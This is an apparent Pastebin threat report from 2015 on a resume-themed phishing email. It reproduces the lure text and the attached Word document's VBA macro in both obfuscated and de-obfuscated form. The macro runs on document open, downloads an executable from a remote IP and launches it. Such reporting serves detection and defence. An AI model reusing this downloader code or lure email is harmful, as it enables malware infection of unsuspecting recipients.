Advertisement
Neonprimetime

Resume Phish: Openings? 80.242.123.211

Apr 7th, 2015
434
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Resume Phish with VBA Macro
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. Blogs about this:
  7. http://neonprimetime.blogspot.com/2015/04/de-obfuscated-malicious-vba-macro.html
  8. http://neonprimetime.blogspot.com/2015/04/resume-phish-with-vba-macro-in-word.html
  9. *****
  10. Callback
  11. *****
  12. hxxp://80.242.123.211:888/moist.exe
  13.  
  14. *****
  15. Malwr Link
  16. *****
  17. https://malwr.com/analysis/NjdiMGJmMjRhMDRjNDVmZjg5ODhhYWI5NDEyZDZhM2Y/
  18. *****
  19.  
  20. *****
  21. Email
  22. *****
  23. From:   Kathy Galarneau <wilden_boner37418@yahoo.com>  
  24. Subject:    Openings?    
  25. Attachment(s):  CV_66910.doc(application/octet-stream)
  26. Hey there,
  27. I saw your website today Mon, 6 Apr 2015 and im really hoping there is a opening or other possibility to get a chance to prove my competence.
  28. As you will see in my resume I have a broad experience and knowledge in this line of work and im confident it will be worth your time reading it.
  29. I am eager to hearing from you.
  30.  
  31. Please see my CV.
  32. In appreciation,
  33. Kathy Galarneau
  34.  
  35. Sent from my Android Phone
  36.  
  37.  
  38. *****
  39. VBA Macro Obfuscated
  40. *****
  41.  
  42. Attribute VB_Name = "ThisDocument"
  43. Attribute VB_Base = "1Normal.ThisDocument"
  44. Attribute VB_GlobalNameSpace = False
  45. Attribute VB_Creatable = False
  46. Attribute VB_PredeclaredId = True
  47. Attribute VB_Exposed = True
  48. Attribute VB_TemplateDerived = True
  49. Attribute VB_Customizable = True
  50. Option Explicit
  51. #If Win64 Then
  52. Private Declare PtrSafe Function g Lib "shell32.dll" Alias "ShellExecuteA" _
  53. (ByVal a As Long, ByVal b As String, _
  54. ByVal b As String, ByVal d As String, ByVal e As String, _
  55. ByVal f As Long) As Long
  56. #Else
  57. Private Declare Function g Lib "shell32.dll" Alias "ShellExecuteA" _
  58. (ByVal a As Long, ByVal b As String, _
  59. ByVal b As String, ByVal d As String, ByVal e As String, _
  60. ByVal f As Long) As Long
  61. #End If
  62.  
  63. Sub Document_Open()
  64. i
  65. End Sub
  66.  
  67. Sub i()
  68. Dim a As String
  69. Dim b As String
  70. Dim c As Long
  71. Dim d As Long
  72. d = 0
  73. a = l("m")
  74. b = "xe"
  75. a = m(a, "\df.e", b)
  76. b = "htt" & "p://8" & "0.242.123.211:88" & "8/moist.e" & b
  77. Dim e As MSXML2.XMLHTTP30, f As Long
  78. Set e = New MSXML2.XMLHTTP30
  79. e.Open "G" & "E" & "T", b, False
  80. e.send
  81. If e.Status = (20 * 11 - 20) Then
  82.     f = FreeFile
  83.     Open a For Binary As #f
  84.     Put #f, , h(e)
  85.     Close #f
  86. End If
  87. Dim x As Boolean
  88. x = k(a, "pen")
  89. End Sub
  90.  
  91. Function m(ByVal a As String, ByVal b As String, ByVal c As String) As String
  92. m = a & b & c
  93. End Function
  94.  
  95. Function l(ByVal a As String) As String
  96. l = Environ("t" & a & "p")
  97. End Function
  98.  
  99. Function k(ByVal a As String, ByVal b As String) As Boolean
  100. g 0, "o" & b, a, "", vbNullString, vbNormalFocus
  101. k = False
  102. End Function
  103.  
  104. Function h(ByRef a As MSXML2.XMLHTTP30) As Byte()
  105. Dim b() As Byte
  106. b = a.responseBody
  107. h = b
  108. End Function
  109.  
  110.  
  111. *****
  112. VBA Macro De-Obfuscated
  113. *****
  114. #If Win64 Then
  115.     Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
  116.         (ByVal a As Long, ByVal b As String, _
  117.         ByVal b As String, ByVal d As String, ByVal e As String, _
  118.         ByVal f As Long) As Long
  119. #Else
  120.     Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
  121.         (ByVal a As Long, ByVal b As String, _
  122.         ByVal b As String, ByVal d As String, ByVal e As String, _
  123.         ByVal f As Long) As Long
  124. #End If
  125.  
  126. Sub Document_Open()
  127.     DownloadAndExecute
  128. End Sub
  129.  
  130. Sub DownloadAndExecute()
  131.     Dim maliciousFileLocation = Environ("tmp\df.exe")
  132.     Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
  133.     Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
  134.     XMLHttpRequestObject.Open "GET", PayloadUrl, False
  135.     XMLHttpRequestObject.send
  136.     If XMLHttpRequestObject.Status = 200 Then
  137.         Dim fileId = FreeFile
  138.         Open maliciousFileLocation For Binary As #fileId
  139.         Put #fileId, , XMLHttpRequestObject.responseBody
  140.         Close #fileId
  141.     End If
  142.     ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
  143. End Sub
Advertisement
RAW Paste Data Copied
Advertisement